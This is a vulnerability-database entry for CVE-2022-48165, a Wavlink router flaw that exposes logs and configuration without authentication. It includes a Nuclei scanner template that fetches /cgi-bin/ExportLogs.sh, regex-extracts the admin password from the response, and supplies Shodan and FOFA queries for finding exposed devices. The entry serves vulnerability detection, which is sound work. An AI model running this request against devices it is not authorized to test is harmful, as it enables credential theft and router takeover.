Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-48165
HistoryFeb 06, 2023 - 12:45 p.m.

Wavlink - Improper Access Control

2023-02-0612:45:15
ProjectDiscovery
github.com
4
wavlink
router
exposure
cve2022
vulnerability
access control
data leakage

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS

0.049

Percentile

92.9%

Wavlink WL-WN530H4 M30H4.V5030.210121 is susceptible to improper access control in the component /cgi-bin/ExportLogs.sh. An attacker can download configuration data and log files, obtain admin credentials, and potentially execute unauthorized operations.
id: CVE-2022-48165

info:
  name: Wavlink - Improper Access Control
  author: For3stCo1d
  severity: high
  description: |
    Wavlink WL-WN530H4 M30H4.V5030.210121 is susceptible to improper access control in the component /cgi-bin/ExportLogs.sh. An attacker can download configuration data and log files, obtain admin credentials, and potentially execute unauthorized operations.
  impact: |
    The vulnerability can lead to unauthorized access, data leakage, or unauthorized actions on the affected device.
  remediation: |
    Apply the latest firmware update provided by the vendor to fix the access control issue.
  reference:
    - https://docs.google.com/document/d/1HD4GKumkZpa6FNHuf0QQSKFvoYhCfwXpbyWiJdx1VtE
    - https://twitter.com/For3stCo1d/status/1622576544190464000
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48165
    - https://github.com/strik3r0x1/Vulns/blob/main/WAVLINK_WL-WN530H4.md
    - https://nvd.nist.gov/vuln/detail/CVE-2022-48165
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-48165
    cwe-id: CWE-284
    epss-score: 0.04111
    epss-percentile: 0.9131
    cpe: cpe:2.3:o:wavlink:wl-wn530h4_firmware:m30h4.v5030.210121:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wavlink
    product: wl-wn530h4_firmware
    shodan-query: http.favicon.hash:-1350437236
    fofa-query: icon_hash=-1350437236
  tags: cve2022,cve,wavlink,router,exposure

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/ExportLogs.sh"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Password='
          - 'Login='
        condition: and

      - type: word
        part: header
        words:
          - filename="sysLogs.txt"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        regex:
          - 'Password=([^\s]+)'
# digest: 490a00463044022056539b6cd3745e8d5dac980c0dfa0c22f75edcf4a24a9b1bf7f9c73769790efb02203bb9b12fdbd27068e9be86fb0334827b8bd8e30005b9a1c863645194cea28f1b:922c64590222798bb761d5b6d8e72950

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS

0.049

Percentile

92.9%

Related for NUCLEI:CVE-2022-48165